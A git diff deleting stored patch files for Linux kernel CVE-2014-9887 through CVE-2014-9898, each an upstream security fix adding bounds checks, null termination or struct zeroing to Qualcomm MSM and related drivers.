diff --git a/Patches/Linux_CVEs/CVE-2014-9887/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9887/ANY/0001.patch
deleted file mode 100644
index 76fc99b4..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9887/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From b1bc773cf61265e0e3871b2e52bd6b3270ffc6c3 Mon Sep 17 00:00:00 2001
-From: Zhen Kong
-Date: Thu, 27 Mar 2014 12:44:15 -0700
-Subject: qseecom: Validate pointer offset in qseecom_send_modfd_cmd
-
-Validate cmd_req_buf pointer offset in qseecom_send_modfy_cmd, and
-make sure cmd buffer address to be within shared bufffer.
-
-Change-Id: I431511a92ab2cccbc2daebc0cf76cc3872689a97
-Signed-off-by: Zhen Kong
----
- drivers/misc/qseecom.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 5d2b64c..bce4994 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -1635,6 +1635,13 @@ static int qseecom_send_modfd_cmd(struct qseecom_dev_handle *data,
- pr_err("response buffer address not within shared bufffer\n");
- return -EINVAL;
- }
-+
-+ if (req.cmd_req_len == 0 || req.cmd_req_len > data->client.sb_length ||
-+ req.resp_len > data->client.sb_length) {
-+ pr_err("cmd or response buffer length not valid\n");
-+ return -EINVAL;
-+ }
-+
- send_cmd_req.cmd_req_buf = req.cmd_req_buf;
- send_cmd_req.cmd_req_len = req.cmd_req_len;
- send_cmd_req.resp_buf = req.resp_buf;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9888/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9888/ANY/0001.patch
deleted file mode 100644
index 47a0698c..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9888/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From f044936caab337a4384fbfe64a4cbae33c7e22a1 Mon Sep 17 00:00:00 2001
-From: Russell King
-Date: Wed, 23 Oct 2013 16:14:59 +0100
-Subject: ARM: dma-mapping: don't allow DMA mappings to be marked executable
-
-DMA mapping permissions were being derived from pgprot_kernel directly
-without using PAGE_KERNEL. This causes them to be marked with executable
-permission, which is not what we want. Fix this.
-
-Change-Id: Ib40f59f3c569f82409943cf8f9a86a9869d922cc
-Signed-off-by: Russell King
-Git-commit: 0ea1ec713f04bdfac343c9702b21cd3a7c711826
-Git-repo: git://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git
-[lauraa@codeaurora.org: dropped functions not in older builds]
-Signed-off-by: Laura Abbott
----
- arch/arm/mm/dma-mapping.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/arch/arm/mm/dma-mapping.c b/arch/arm/mm/dma-mapping.c
-index 230dfe0ef..935bb9a 100644
---- a/arch/arm/mm/dma-mapping.c
-+++ b/arch/arm/mm/dma-mapping.c
-@@ -657,7 +657,7 @@ static void *__dma_alloc(struct device *dev, size_t size, dma_addr_t *handle,
- void *arm_dma_alloc(struct device *dev, size_t size, dma_addr_t *handle,
- gfp_t gfp, struct dma_attrs *attrs)
- {
-- pgprot_t prot = __get_dma_pgprot(attrs, pgprot_kernel);
-+ pgprot_t prot = __get_dma_pgprot(attrs, PAGE_KERNEL);
- void *memory;
- bool no_kernel_mapping = dma_get_attr(DMA_ATTR_NO_KERNEL_MAPPING,
- attrs);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9889/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9889/ANY/0001.patch
deleted file mode 100644
index cf130879..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9889/ANY/0001.patch
+++ /dev/null
@@ -1,155 +0,0 @@
-From f4e2f2d4ef58c88340774099dff3324ec8baa24a Mon Sep 17 00:00:00 2001
-From: Manish Poddar
-Date: Thu, 10 Jul 2014 19:43:31 +0530
-Subject: msm: cpp: Validate frame message before manipulating it
-
-CPP frame message is used to send all frame data
-to Microcontroller. It is sent every frame. CPP kernel
-driver has to add information to it before transfer it.
-The message has to be validated before manipulations.
-If it is not valid the message and corresponding frame
-are discarded.
-Change-Id: Ib5b9b5d2e1886d3d671966b693ce212d58e34041
-Signed-off-by: Manish Poddar
----
- .../platform/msm/camera_v2/pproc/cpp/msm_cpp.c | 61 +++++++++++++++++-----
- .../platform/msm/camera_v2/pproc/cpp/msm_cpp.h | 1 +
- include/media/msmb_pproc.h | 3 +-
- 3 files changed, 50 insertions(+), 15 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-index d3a848a..253cbed 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.c
-@@ -56,6 +56,16 @@
- #define MSM_CPP_NOMINAL_CLOCK 266670000
- #define MSM_CPP_TURBO_CLOCK 320000000
-
-+#define CPP_FW_VERSION_1_2_0 0x10020000
-+#define CPP_FW_VERSION_1_4_0 0x10040000
-+#define CPP_FW_VERSION_1_6_0 0x10060000
-+#define CPP_FW_VERSION_1_8_0 0x10080000
-+
-+/* stripe information offsets in frame command */
-+#define STRIPE_BASE_FW_1_2_0 130
-+#define STRIPE_BASE_FW_1_4_0 140
-+#define STRIPE_BASE_FW_1_6_0 464
-+
- struct msm_cpp_timer_data_t {
- struct cpp_device *cpp_dev;
- struct msm_cpp_frame_info_t *processed_frame;
-@@ -918,7 +928,8 @@ static void cpp_load_fw(struct cpp_device *cpp_dev, char *fw_name_bin)
- msm_cpp_poll(cpp_dev->base, MSM_CPP_MSG_ID_CMD);
- msm_cpp_poll(cpp_dev->base, 0x2);
- msm_cpp_poll(cpp_dev->base, MSM_CPP_MSG_ID_FW_VER);
-- pr_info("CPP FW Version: 0x%x\n", msm_cpp_read(cpp_dev->base));
-+ cpp_dev->fw_version = msm_cpp_read(cpp_dev->base);
-+ pr_info("CPP FW Version: 0x%08x\n", cpp_dev->fw_version);
- msm_cpp_poll(cpp_dev->base, MSM_CPP_MSG_ID_TRAILER);
-
- /*Disable MC clock*/
-@@ -1287,9 +1298,8 @@ static int msm_cpp_cfg(struct cpp_device *cpp_dev,
- struct msm_cpp_frame_info_t *u_frame_info =
- (struct msm_cpp_frame_info_t *)ioctl_ptr->ioctl_ptr;
- int32_t status = 0;
-- uint8_t fw_version_1_2_x = 0;
- int in_fd;
--
-+ int32_t stripe_base = 0;
- int i = 0;
- if (!new_frame) {
- pr_err("Insufficient memory. return\n");
-@@ -1330,7 +1340,16 @@ static int msm_cpp_cfg(struct cpp_device *cpp_dev,
- }
-
- new_frame->cpp_cmd_msg = cpp_frame_msg;
--
-+ if (cpp_frame_msg == NULL ||
-+ (new_frame->msg_len < MSM_CPP_MIN_FRAME_LENGTH)) {
-+ pr_err("%s %d Length is not correct or frame message is missing\n",
-+ __func__, __LINE__);
-+ return -EINVAL;
-+ }
-+ if (cpp_frame_msg[new_frame->msg_len - 1] != MSM_CPP_MSG_ID_TRAILER) {
-+ pr_err("%s %d Invalid frame message\n", __func__, __LINE__);
-+ return -EINVAL;
-+ }
- in_phyaddr = msm_cpp_fetch_buffer_info(cpp_dev,
- &new_frame->input_buffer_info,
- ((new_frame->input_buffer_info.identity >> 16) & 0xFFFF),
-@@ -1404,22 +1423,36 @@ static int msm_cpp_cfg(struct cpp_device *cpp_dev,
- ((cpp_frame_msg[12] >> 10) & 0x3FF) +
- (cpp_frame_msg[12] & 0x3FF);
-
-- fw_version_1_2_x = 0;
-- if ((cpp_dev->hw_info.cpp_hw_version == CPP_HW_VERSION_1_1_0) ||
-- (cpp_dev->hw_info.cpp_hw_version == CPP_HW_VERSION_1_1_1) ||
-- (cpp_dev->hw_info.cpp_hw_version == CPP_HW_VERSION_2_0_0))
-- fw_version_1_2_x = 2;
-+ if ((cpp_dev->fw_version & 0xffff0000) ==
-+ CPP_FW_VERSION_1_2_0) {
-+ stripe_base = STRIPE_BASE_FW_1_2_0;
-+ } else if ((cpp_dev->fw_version & 0xffff0000) ==
-+ CPP_FW_VERSION_1_4_0) {
-+ stripe_base = STRIPE_BASE_FW_1_4_0;
-+ } else if ((cpp_dev->fw_version & 0xffff0000) ==
-+ CPP_FW_VERSION_1_6_0) {
-+ stripe_base = STRIPE_BASE_FW_1_6_0;
-+ } else {
-+ pr_err("invalid fw version %08x", cpp_dev->fw_version);
-+ }
-+
-+ if ((stripe_base + num_stripes*27 + 1) != new_frame->msg_len) {
-+ pr_err("Invalid frame message\n");
-+ rc = -EINVAL;
-+ goto ERROR3;
-+ }
-+
-
- for (i = 0; i < num_stripes; i++) {
-- cpp_frame_msg[(133 + fw_version_1_2_x) + i * 27] +=
-+ cpp_frame_msg[stripe_base + 5 + i*27] +=
- (uint32_t) in_phyaddr;
-- cpp_frame_msg[(139 + fw_version_1_2_x) + i * 27] +=
-+ cpp_frame_msg[stripe_base + 11 + i * 27] +=
- (uint32_t) out_phyaddr0;
-- cpp_frame_msg[(140 + fw_version_1_2_x) + i * 27] +=
-+ cpp_frame_msg[stripe_base + 12 + i * 27] +=
- (uint32_t) out_phyaddr1;
-- cpp_frame_msg[(141 + fw_version_1_2_x) + i * 27] +=
-+ cpp_frame_msg[stripe_base + 13 + i * 27] +=
- (uint32_t) out_phyaddr0;
-- cpp_frame_msg[(142 + fw_version_1_2_x) + i * 27] +=
-+ cpp_frame_msg[stripe_base + 14 + i * 27] +=
- (uint32_t) out_phyaddr1;
- }
-
-diff --git a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.h b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.h
-index bd73ab2..af1af2d 100644
---- a/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.h
-+++ b/drivers/media/platform/msm/camera_v2/pproc/cpp/msm_cpp.h
-@@ -189,6 +189,7 @@ struct cpp_device {
- char *fw_name_bin;
- struct workqueue_struct *timer_wq;
- struct msm_cpp_work_t *work;
-+ uint32_t fw_version;
- uint8_t stream_cnt;
- uint8_t timeout_trial_cnt;
-
-diff --git a/include/media/msmb_pproc.h b/include/media/msmb_pproc.h
-index 59dcca9..f5a53a8 100644
---- a/include/media/msmb_pproc.h
-+++ b/include/media/msmb_pproc.h
-@@ -13,7 +13,8 @@
-
- #define MAX_NUM_CPP_STRIPS 8
- #define MSM_CPP_MAX_NUM_PLANES 3
--#define MSM_CPP_MAX_FRAME_LENGTH 1024
-+#define MSM_CPP_MIN_FRAME_LENGTH 13
-+#define MSM_CPP_MAX_FRAME_LENGTH 2048
- #define MSM_CPP_MAX_FW_NAME_LEN 32
- #define MAX_FREQ_TBL 10
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9890/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9890/ANY/0001.patch
deleted file mode 100644
index 5be0e2d8..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9890/ANY/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 14e0c8614d2715589583d8a95e33c422d110eb6f Mon Sep 17 00:00:00 2001
-From: Rajesh Bondugula
-Date: Tue, 25 Jun 2013 17:45:23 -0700
-Subject: msm: camera: Update CCI WR comamnd buffer size to 11 bytes
-
-I2C command length is of 11 bytes, it includes 10 bytes of data and
-1 byte of WR command. Use 11 bytes char array to create command.
-
-Signed-off-by: Rajesh Bondugula
-Change-Id: I5292f238d612810a514b6a8bba9e70e07eb2627f
----
- drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-index 61873d3..ddc3b57 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-@@ -181,7 +181,7 @@ static int32_t msm_cci_data_queue(struct cci_device *cci_dev,
- uint16_t i = 0, j = 0, k = 0, h = 0, len = 0;
- int32_t rc = 0;
- uint32_t cmd = 0, delay = 0;
-- uint8_t data[10];
-+ uint8_t data[11];
- uint16_t reg_addr = 0;
- struct msm_camera_i2c_reg_setting *i2c_msg =
- &c_ctrl->cfg.cci_i2c_write_cfg;
-@@ -616,7 +616,7 @@ static int32_t msm_cci_i2c_write(struct v4l2_subdev *sd,
- msm_cci_flush_queue(cci_dev, master);
- goto ERROR;
- } else {
-- rc = 0;
-+ rc = cci_dev->cci_master_info[master].status;
- }
- CDBG("%s:%d X wait_for_completion_interruptible\n", __func__,
- __LINE__);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9891/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9891/ANY/0001.patch
deleted file mode 100644
index cd8b5d65..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9891/ANY/0001.patch
+++ /dev/null
@@ -1,64 +0,0 @@
-From c10f03f191307f7114af89933f2d91b830150094 Mon Sep 17 00:00:00 2001
-From: Hariprasad Dhalinarasimha
-Date: Fri, 27 Sep 2013 18:38:53 -0700
-Subject: qseecom: Copy userspace buffer into kernel space before dereferencing
-
-ION memory is used for user space to kernel space data passing.
-This is directly accessible in kernel. But, if the IOCTL is called
-from user space without using User space library, then data might
-be pointing to some other memory location, in which case, it would
-not be possible to dereference this location in kernel & hence it
-would be accessing invalid memory.
-
-Change-Id: Ic50c76ee8b2a696dbb786fce3a68cdc782e15268
-Signed-off-by: Hariprasad Dhalinarasimha
----
- drivers/misc/qseecom.c | 25 ++++++++++++++++++++++++-
- 1 file changed, 24 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 4c1943b..1c93bf4 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -1006,14 +1006,37 @@ int __qseecom_process_rpmb_svc_cmd(struct qseecom_dev_handle *data_ptr,
- struct qseecom_client_send_service_ireq *send_svc_ireq_ptr)
- {
- int ret = 0;
-+ void *req_buf = NULL;
-+
- if ((req_ptr == NULL) || (send_svc_ireq_ptr == NULL)) {
- pr_err("Error with pointer: req_ptr = %p, send_svc_ptr = %p\n",
- req_ptr, send_svc_ireq_ptr);
- return -EINVAL;
- }
-+
-+ if (((uint32_t)req_ptr->cmd_req_buf <
-+ data_ptr->client.user_virt_sb_base)
-+ || ((uint32_t)req_ptr->cmd_req_buf >=
-+ (data_ptr->client.user_virt_sb_base +
-+ data_ptr->client.sb_length))) {
-+ pr_err("cmd buffer address not within shared bufffer\n");
-+ return -EINVAL;
-+ }
-+
-+
-+ if (((uint32_t)req_ptr->resp_buf < data_ptr->client.user_virt_sb_base)
-+ || ((uint32_t)req_ptr->resp_buf >=
-+ (data_ptr->client.user_virt_sb_base +
-+ data_ptr->client.sb_length))){
-+ pr_err("response buffer address not within shared bufffer\n");
-+ return -EINVAL;
-+ }
-+
-+ req_buf = data_ptr->client.sb_virt;
-+
- send_svc_ireq_ptr->qsee_cmd_id = req_ptr->cmd_id;
- send_svc_ireq_ptr->key_type =
-- ((struct qseecom_rpmb_provision_key *)req_ptr->cmd_req_buf)->key_type;
-+ ((struct qseecom_rpmb_provision_key *)req_buf)->key_type;
- send_svc_ireq_ptr->req_len = req_ptr->cmd_req_len;
- send_svc_ireq_ptr->rsp_ptr = (void *)(__qseecom_uvirt_to_kphys(data_ptr,
- (uint32_t)req_ptr->resp_buf));
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9892/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9892/ANY/0001.patch
deleted file mode 100644
index 8da8a684..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9892/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 591b1f455c32206704cbcf426bb30911c260c33e Mon Sep 17 00:00:00 2001
-From: Krishnankutty Kolathappilly
-Date: Wed, 6 Nov 2013 10:08:39 -0800
-Subject: ALSA: compress: Memset timestamp structure to zero.
-
-snd_compr_tstamp is initialized using aggregate initialization
-that does not zero out the padded bytes. Initialize timestamp
-structure to zero using memset to avoid this.
-
-CRs-Fixed: 568717
-Change-Id: I7a7d188705161f06201f1a1f2945bb6acd633d5d
-Signed-off-by: Krishnankutty Kolathappilly
----
- sound/core/compress_offload.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/sound/core/compress_offload.c b/sound/core/compress_offload.c
-index 99db892..0a69437 100644
---- a/sound/core/compress_offload.c
-+++ b/sound/core/compress_offload.c
-@@ -613,9 +613,10 @@ snd_compr_set_metadata(struct snd_compr_stream *stream, unsigned long arg)
- static inline int
- snd_compr_tstamp(struct snd_compr_stream *stream, unsigned long arg)
- {
-- struct snd_compr_tstamp tstamp = {0};
-+ struct snd_compr_tstamp tstamp;
- int ret;
-
-+ memset(&tstamp, 0, sizeof(tstamp));
- ret = snd_compr_update_tstamp(stream, &tstamp);
- if (ret == 0)
- ret = copy_to_user((struct snd_compr_tstamp __user *)arg,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9893/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9893/ANY/0001.patch
deleted file mode 100644
index 912d44a7..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9893/ANY/0001.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From bfc6eee5e30a0c20bc37495233506f4f0cc4991d Mon Sep 17 00:00:00 2001
-From: Ping Li
-Date: Thu, 3 Oct 2013 20:01:52 -0400
-Subject: msm: mdss: Replace the size check for gamut LUTs
-
-Add more reliable size check for gamut LUTs to prevent potential
-security issues such as information leak.
-
-Change-Id: I32be41a2612a100b9ba6167737c2f8778f720fa2
-Signed-off-by: Ping Li
----
- drivers/video/msm/mdss/mdss_mdp_pp.c | 33 +++++++++++++++++++++++++++++----
- 1 file changed, 29 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pp.c b/drivers/video/msm/mdss/mdss_mdp_pp.c
-index ed95030..1d8430e 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pp.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pp.c
-@@ -295,6 +295,10 @@ static void pp_update_argc_lut(char __iomem *addr,
- struct mdp_pgc_lut_data *config);
- static void pp_update_hist_lut(char __iomem *base,
- struct mdp_hist_lut_data *cfg);
-+static int pp_gm_has_invalid_lut_size(struct mdp_gamut_cfg_data *config);
-+static void pp_gamut_config(struct mdp_gamut_cfg_data *gamut_cfg,
-+ char __iomem *base,
-+ struct pp_sts_type *pp_sts);
- static void pp_pa_config(unsigned long flags, char __iomem *addr,
- struct pp_sts_type *pp_sts,
- struct mdp_pa_cfg *pa_config);
-@@ -2086,10 +2090,32 @@ int mdss_mdp_dither_config(struct mdp_dither_cfg_data *config,
- return 0;
- }
-
-+static int pp_gm_has_invalid_lut_size(struct mdp_gamut_cfg_data *config)
-+{
-+ if (config->tbl_size[0] != GAMUT_T0_SIZE)
-+ return -EINVAL;
-+ if (config->tbl_size[1] != GAMUT_T1_SIZE)
-+ return -EINVAL;
-+ if (config->tbl_size[2] != GAMUT_T2_SIZE)
-+ return -EINVAL;
-+ if (config->tbl_size[3] != GAMUT_T3_SIZE)
-+ return -EINVAL;
-+ if (config->tbl_size[4] != GAMUT_T4_SIZE)
-+ return -EINVAL;
-+ if (config->tbl_size[5] != GAMUT_T5_SIZE)
-+ return -EINVAL;
-+ if (config->tbl_size[6] != GAMUT_T6_SIZE)
-+ return -EINVAL;
-+ if (config->tbl_size[7] != GAMUT_T7_SIZE)
-+ return -EINVAL;
-+
-+ return 0;
-+}
-+
- int mdss_mdp_gamut_config(struct mdp_gamut_cfg_data *config,
- u32 *copyback)
- {
-- int i, j, size_total = 0, ret = 0;
-+ int i, j, ret = 0;
-
- u32 disp_num, dspp_num = 0;
- uint16_t *tbl_off;
-@@ -2102,9 +2128,8 @@ int mdss_mdp_gamut_config(struct mdp_gamut_cfg_data *config,
- if ((config->block < MDP_LOGICAL_BLOCK_DISP_0) ||
- (config->block >= MDP_BLOCK_MAX))
- return -EINVAL;
-- for (i = 0; i < MDP_GAMUT_TABLE_NUM; i++)
-- size_total += config->tbl_size[i];
-- if (size_total != GAMUT_TOTAL_TABLE_SIZE)
-+
-+ if (pp_gm_has_invalid_lut_size(config))
- return -EINVAL;
-
- mutex_lock(&mdss_pp_mutex);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9894/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9894/ANY/0001.patch
deleted file mode 100644
index 208f38e3..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9894/ANY/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 83214431cd02674c70402b160b16b7427e28737f Mon Sep 17 00:00:00 2001
-From: Hariprasad Dhalinarasimha
-Date: Thu, 3 Oct 2013 16:52:16 -0700
-Subject: qseecom: Ensure incoming "app_name" does not corrupt the kernel stack
-
-Printing a string with that does not have null terminated character,
-would lead to overflow, as the print continues until it finds a null
-terminated character.
-Avoid this issue by explicitly assigning a string with null termination.
-
-Change-Id: I9528db2ba046c514d829097d08c09540588bb1a2
-Signed-off-by: Hariprasad Dhalinarasimha
----
- drivers/misc/qseecom.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 4c1943b..7ab8089 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -773,6 +773,7 @@ static int qseecom_load_app(struct qseecom_dev_handle *data, void __user *argp)
- if (ret)
- return ret;
- req.qsee_cmd_id = QSEOS_APP_LOOKUP_COMMAND;
-+ load_img_req.img_name[MAX_APP_NAME_SIZE-1] = '\0';
- memcpy(req.app_name, load_img_req.img_name, MAX_APP_NAME_SIZE);
-
- ret = __qseecom_check_app_exists(req);
-@@ -2453,6 +2454,7 @@ static int qseecom_query_app_loaded(struct qseecom_dev_handle *data,
- }
-
- req.qsee_cmd_id = QSEOS_APP_LOOKUP_COMMAND;
-+ query_req.app_name[MAX_APP_NAME_SIZE-1] = '\0';
- memcpy(req.app_name, query_req.app_name, MAX_APP_NAME_SIZE);
-
- ret = __qseecom_check_app_exists(req);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9895/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9895/ANY/0001.patch
deleted file mode 100644
index 63d33160..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9895/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From cc4b26575602e492efd986e9a6ffc4278cee53b5 Mon Sep 17 00:00:00 2001
-From: Deva Ramasubramanian
-Date: Fri, 24 Jan 2014 12:38:37 -0800
-Subject: [media] media: Init the reserved fields of struct media_link_desc
-
-struct media_link_desc is copy_to_user'ed as the return value of
-MEDIA_IOC_ENUM_LINKS. When copying, the driver is omitting to initialise
-the reserved fields. This commit fixes that by initialising the
-reserved fields to 0.
-
-CRs-Fixed: 570757
-Change-Id: I230e2666c0845cc36399518a0f2c94db664382d1
-Signed-off-by: Deva Ramasubramanian
----
- drivers/media/media-device.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/media-device.c b/drivers/media/media-device.c
-index 6f9eb94..4f39838 100644
---- a/drivers/media/media-device.c
-+++ b/drivers/media/media-device.c
-@@ -139,7 +139,7 @@ static long media_device_enum_links(struct media_device *mdev,
- unsigned int p;
-
- for (p = 0; p < entity->num_pads; p++) {
-- struct media_pad_desc pad;
-+ struct media_pad_desc pad = {0};
- media_device_kpad_to_upad(&entity->pads[p], &pad);
- if (copy_to_user(&links.pads[p], &pad, sizeof(pad)))
- return -EFAULT;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9896/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9896/ANY/0001.patch
deleted file mode 100644
index 7203bf11..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9896/ANY/0001.patch
+++ /dev/null
@@ -1,86 +0,0 @@
-From 89f2bcf1ac860b0b380e579e9a8764013f263a7d Mon Sep 17 00:00:00 2001
-From: Mitchel Humpherys
-Date: Fri, 25 Oct 2013 12:05:47 -0700
-Subject: msm: ADSPRPC: Add checks for erroneous values
-
-Check for invalid parameters passed in user invocation
-and validate the return values using appropriate macros.
-
-Change-Id: If529873d025ac0c13725efbedda5a58fae327722
-Acked-by: Sathish Ambley
-Signed-off-by: Mitchel Humpherys
----
- drivers/char/adsprpc.c | 16 +++++++++++-----
- 1 file changed, 11 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/char/adsprpc.c b/drivers/char/adsprpc.c
-index e421135..c8b6c0a 100644
---- a/drivers/char/adsprpc.c
-+++ b/drivers/char/adsprpc.c
-@@ -199,7 +199,7 @@ static void free_mem(struct fastrpc_buf *buf)
- me->smmu.domain_id, 0);
- buf->phys = 0;
- }
-- if (buf->virt) {
-+ if (!IS_ERR_OR_NULL(buf->virt)) {
- ion_unmap_kernel(me->iclient, buf->handle);
- buf->virt = 0;
- }
-@@ -212,7 +212,7 @@ static void free_map(struct fastrpc_mmap *map)
- {
- struct fastrpc_apps *me = &gfa;
- if (!IS_ERR_OR_NULL(map->handle)) {
-- if (map->virt) {
-+ if (!IS_ERR_OR_NULL(map->virt)) {
- ion_unmap_kernel(me->iclient, map->handle);
- map->virt = 0;
- }
-@@ -231,13 +231,15 @@ static int alloc_mem(struct fastrpc_buf *buf)
- unsigned long len;
- buf->handle = 0;
- buf->virt = 0;
-+ buf->phys = 0;
- heap = me->smmu.enabled ? ION_HEAP(ION_IOMMU_HEAP_ID) :
- ION_HEAP(ION_ADSP_HEAP_ID) | ION_HEAP(ION_AUDIO_HEAP_ID);
- buf->handle = ion_alloc(clnt, buf->size, SZ_4K, heap, ION_FLAG_CACHED);
- VERIFY(err, 0 == IS_ERR_OR_NULL(buf->handle));
- if (err)
- goto bail;
-- VERIFY(err, 0 != (buf->virt = ion_map_kernel(clnt, buf->handle)));
-+ buf->virt = ion_map_kernel(clnt, buf->handle);
-+ VERIFY(err, 0 == IS_ERR_OR_NULL(buf->virt));
- if (err)
- goto bail;
- if (me->smmu.enabled) {
-@@ -356,6 +358,9 @@ static int get_page_list(uint32_t kernel, uint32_t sc, remote_arg_t *pra,
- list[i].num = 0;
- list[i].pgidx = 0;
- len = pra[i].buf.len;
-+ VERIFY(err, len >= 0);
-+ if (err)
-+ goto bail;
- if (!len)
- continue;
- buf = pra[i].buf.pv;
-@@ -857,7 +862,7 @@ static int fastrpc_internal_invoke(struct fastrpc_apps *me, uint32_t mode,
- context_free(ctx);
-
- if (me->smmu.enabled) {
-- bufs = REMOTE_SCALARS_LENGTH(sc);
-+ bufs = REMOTE_SCALARS_INBUFS(sc) + REMOTE_SCALARS_OUTBUFS(sc);
- if (fds) {
- handles = (struct ion_handle **)(fds + bufs);
- for (i = 0; i < bufs; i++)
-@@ -1037,7 +1042,8 @@ static int fastrpc_internal_mmap(struct fastrpc_apps *me,
- VERIFY(err, 0 == IS_ERR_OR_NULL(map->handle));
- if (err)
- goto bail;
-- VERIFY(err, 0 != (map->virt = ion_map_kernel(clnt, map->handle)));
-+ map->virt = ion_map_kernel(clnt, map->handle);
-+ VERIFY(err, 0 == IS_ERR_OR_NULL(map->virt));
- if (err)
- goto bail;
- buf = (void *)mmap->vaddrin;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9897/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9897/ANY/0001.patch
deleted file mode 100644
index c7d0a1b0..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9897/ANY/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 46135d80765cb70a914f02a6e7b6abe64679ec86 Mon Sep 17 00:00:00 2001
-From: Mohammad Johny Shaik
-Date: Wed, 13 Nov 2013 15:45:34 -0800
-Subject: msm:qdsp6v2: Check null pointer on userspace data argument in kernel
-
-The null pointer check is required to ensure that userspace data
-in kernalspace is not null.
-
-Change-Id: I9e522c393ae643626a4bae03731a73f5d6db6458
-CRs-Fixed: 563752
-Signed-off-by: Mohammad Johny Shaik
----
- sound/soc/msm/qdsp6v2/msm-lsm-client.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/sound/soc/msm/qdsp6v2/msm-lsm-client.c b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-index fe6ed29..2bca5e18 100644
---- a/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-+++ b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-@@ -170,6 +170,9 @@ static int msm_lsm_ioctl(struct snd_pcm_substream *substream,
- */
- rc = -EFAULT;
- } else {
-+ if (!access_ok(VERIFY_READ, user,
-+ sizeof(struct snd_lsm_event_status)))
-+ rc = -EFAULT;
- if (user->payload_size <
- event_status->payload_size) {
- pr_debug("%s: provided %dbytes isn't enough, needs %dbytes\n",
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9898/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9898/ANY/0001.patch
deleted file mode 100644
index 15191d3a..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9898/ANY/0001.patch
+++ /dev/null
@@ -1,178 +0,0 @@
